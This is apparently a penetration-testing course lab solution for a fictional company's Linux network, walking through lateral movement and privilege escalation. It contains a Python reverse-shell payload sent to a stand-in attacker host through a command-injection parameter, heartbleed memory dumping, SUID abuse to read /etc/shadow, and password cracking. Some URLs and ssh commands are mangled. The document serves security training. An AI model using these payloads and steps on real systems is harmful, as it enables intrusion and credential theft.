© 2018 Caendra Inc. - Hera For Ptpv5 - Linux Exploitation (Lateral Movement)
© 2018 Caendra Inc. - Hera For Ptpv5 - Linux Exploitation (Lateral Movement)
1. Netblock: 172.16.80.1/24
2. Domain: robotstogo.localdomain
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 2
• Metasploit
• Nmap
• Bash Shell
• Netcat
We’ve obtained access to multiple systems within Robots To Go, Inc.’s environment using a
number of different techniques and exploits. Our next phase is to conduct lateral movement
tasks in order to complete our objectives defined by the customer. Using the knowledge
we’ve gained from previous phases of the engagement, we strengthen our footholds within
the target infrastructure and use the information and credentials we’ve obtained from
compromised hosts to move onto other systems we otherwise didn’t have access to initially.
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 3
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 4
Below, you can find solutions for each task for the Lateral Movement tasks. Remember
though that you can follow your own strategy (which may be different from the one
explained in the following lab). Additionally, the labs contain additional vulnerabilities not
covered below which can also be exploited but may not necessarily be required to
complete the tasks below. Exploit as many of the vulnerabilities you find!
During our initial enumeration phase, an NFS share on IP address 172.16.80.27 should have
revealed some information we might find useful (a .zip archive). Obtain the information
within the archive to obtain access to another system with that information.
While enumerating NFS shares, we found that one particular share was accessible and
contained a “backup.zip” file:
We next, need to mount that NFS share, and access the backup.zip archive:
# mkdir /mnt/172.16.80.27_nfs
# mount -t nfs 172.16.80.27:/home/simon /mnt/172.16.80.27_nfs -o nolock
Once we mount the share, we browse to our local /mnt/172.16.80.27_nfs location, we copy
the backup.zip file to our /tmp directory:
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 5
# cd /mnt/172.16.80.27_nfs
# cp backup.zip /tmp
# cd /tmp
We quickly find that when attempting to unzip the archive, it is password protected:
# unzip backup.zip
We can use “fcrackzip” to run a dictionary attack against the zip archive using the rockyou.txt
wordlist, and hopefully, access its contents with the following command:
The fcrackzip program successfully cracks the backup.zip archive, and reveals a password of
“====0open/n”:
We can now read the contents of the file in the backup.zip archive:
# cd backup/
# cat notes.txt
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 6
TEMP MGMT CONSOLE:
https://172.16.80.24:4433/xl0827_dev_
The “notes.txt” file reveals information to a hidden web directory on another system
172.16.80.24 on port 4433, which we should navigate to:
Clicking on the “here” link within the page reveals a parameter (x=) in the URL of the page:
Reading the message left for devs of the organization, there’s a good chance we may be able
to execute arbitrary commands via that parameter. We try with “?x=id”
url: https://172.16.80.24:4433/xl0827_dev_/?x=id
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 7
We’ve confirmed command execution via the “x” parameter! Let’s use that to get a reverse
shell once again with a netcat listener on our attacker machine, but this time, we’ll use a
python reverse shell and execute that from the “x” parameter:
On attacker:
# nc -nlvp 1234
On target system via the “x” parameter of the hidden web page (make sure to change
<ATTACKER_IP> and <ATTACKER_PORT> values to your listener parameters, and also, the
below code may need to be manually typed, as to make sure all characters are properly
URL:
https://172.16.80.24:4433/xl0827_dev_/?x=python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con
nect(("<ATTACKER_IP>",<ATTACKER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.filen
o(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 8
We have identified information from an NFS share on the “172.16.80.27” system, and have
used that to obtain access to a hidden directory on 172.16.80.24 as the “www-data” user.
During enumeration, we identify that the system “172.16.80.24” contains a web server
running on port 4433 over HTTPS. We also, when scanning that port for vulnerabilities,
discover that it is vulnerable to heartbleed. We use the “+” character before the script name
so that nmap forces checking of the vulnerability on port 4433:
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 9
Having identified a machine vulnerable to heartbleed, we use the Metasploit heartbleed
exploit module to DUMP contents of the machine’s memory in an attempt to get credentials
or other sensitive information we might be able to use to log onto other systems:
Seeing as the exploit was successful, we then run the “strings” command against the resulting
.bin file to reveals some information dumped from memory:
# strings /root/.msf4/loot/….openssl.heartble_151722.bin
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 10
Looks like some credentials for a user “Amanda.” If we think back to the information
gathering phase, and during enumeration of SMB, we should have noticed a user named
“Amanda” from those findings which were relevant to the “172.16.80.27” machine. We try
the above credentials on the SSH port of the 172.16.80.27 machine:
# ssh [email protected]
And are able to successfully log onto the 172.16.80.27 machine as “amanda” using
credentials we identified from the heartbleed exploit against the 172.16.80.24 machine:
One of our first steps at this point is to start post-exploitation enumeration of the system,
and we realize that “Amanda” can execute a SUID root executable “/usr/local/bin/catme,”
among other things.
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 11
We find that the “catme” executable allows reading of any files as root:
$ catme /etc/passwd
In the image above, you’ll also notice that the user “damien” has a UID of 0 when we take a
look at the /etc/passwd file. This means that the Damien user is a root user on the system.
Knowing this and knowing we can also read the /etc/shadow file since we can use the
“catme” SUID executable to read files as root, we will attempt to crack the “damien” users’
hash and see if we can get root access on the system as Damien. We use “unshadow” and
“john” to create a file we can use for john, but first, we copy both the /etc/passwd file and
/etc/shadow to the /tmp directory on the system using the SUID executable to redirect the
output of both of those files:
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 12
$ cd /tmp
$ catme /etc/passwd > passwd
$ catme /etc/shadow > shadow
Once we have both the /etc/passwd and /etc/shadow files copied to the /tmp directory, we
need to transfer those to our attacker system. We can spin up a python HTTP server on port
8888 on the target machine, and download the two files to our attacker system:
# wget http://172.16.80.27:8888/passwd
# wget http://172.16.80.27:8888/shadow
Next, on our attacker system, we’ll use the “unshadow” program to concatenate the two files
into a format we can use for cracking with john:
Next, we can run john against the shadow.john file, and using the “fasttrack.txt” dictionary as
a wordlist:
John quickly cracks the password (secuirty3) for “damien,” and we can now log into
172.16.80.27 as that user. We can also see that our GID is root, and additionally, through
information gathering of our current user, we can see that “Damien” is part of the “sudo”
group, which means he should be able to sudo any command as root.
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 13
# ssh [email protected]
Knowing this information, we can sudo a bash shell and obtain UID 0 status once we enter
Damien’s password:
Root again!
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 14